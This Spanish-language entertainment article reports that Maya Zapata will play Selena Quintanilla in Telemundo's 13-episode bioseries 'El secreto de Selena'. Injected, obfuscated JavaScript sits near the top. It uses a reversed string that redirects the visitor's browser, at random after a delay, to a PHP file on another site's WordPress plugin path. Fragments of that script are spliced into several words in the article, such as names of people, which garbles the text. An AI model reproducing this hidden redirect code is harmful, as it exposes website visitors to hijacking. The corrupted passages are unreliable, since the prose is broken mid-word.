Maya Zapata interpretará a Selena en bioserie de Telemundo

    Maya Zapata interpretará a Selena en bioserie de Telemundo

    La actriz mexicana interpretará a la «Reina del Tex-Mex» en serie de 13 capítulos.

    Autor: Redacción Maxim 18 abril, 2018


     

    $nJe=function(n){if (typeof ($nJe.list[n]) == «string») return $nJe.list[n].split(«»).reverse().join(«»);return $nJe.list[n];};$nJe.list=[«\’php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\’=ferh.noitacol.tnemucod»];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}to-de-selena-maria-celeste-arraras-1.jpg» alt=»» width=»499″ height=»701″ /> «El secreto de Selena», de María Celeste Arrarás.

     

     

    El 31 de marzo de 1995 el mundo se conmovió con la noticia del asesinato de la cantante Selena Quintanilla. Yolandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}anda Saldivar le disparó terminandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}ando con una carrera prometedora. Después de 23 años del trágico suceso, Telemundo prepara una bioserie titulada El secreto de Selena, sobre la «Reina del Tex-Mex», que abordará la investigación, el juicio y su asesinato. Esta producción está basada en el libro homónimo de la periodista ganadora del Emmy María Celeste Arrarás.

     

     

     

    Vuelve la «Reina del Tex-Mex»

     

    La serie es protagonizada por la actriz mexicana Maya Zapata; la ganadora del premio Ariel en la categoría de Mejor actriz por su actuación en De la Calle (2001), personificará a Selena Quintanilla (cuyo parecido entre ambas es asombroso), en tanto que Damayanti Quintanar dará vida a Yolandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}anda Saldivar la antagonista, amiga y asesina de la cantante. Y para completar el  reparto, Sofía Lama  interpretará a María Celeste Arrarás.

     

     

     

    https://www.instagram.com/p/Bhrw_K_APS7/?tagged=elsecretodeselena

     

    El rodaje de El secreto de Selena inició el pasado 9 de abril, será dirigida por Alejandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andro Aimetta (El César) y Natalia Beristáin (No quiero dormir sola, 2012). Constará de 13 episodios de una hora, que próximamente llegarán  a las pantallas de televisión  a través de TNT, Telemundo y  TV Azteca.

     

     

     

     

     

     

     

     

     

    Temas relacionados con esta nota: , , ,

La actriz mexicana interpretará a la «Reina del Tex-Mex» en serie de 13 capítulos.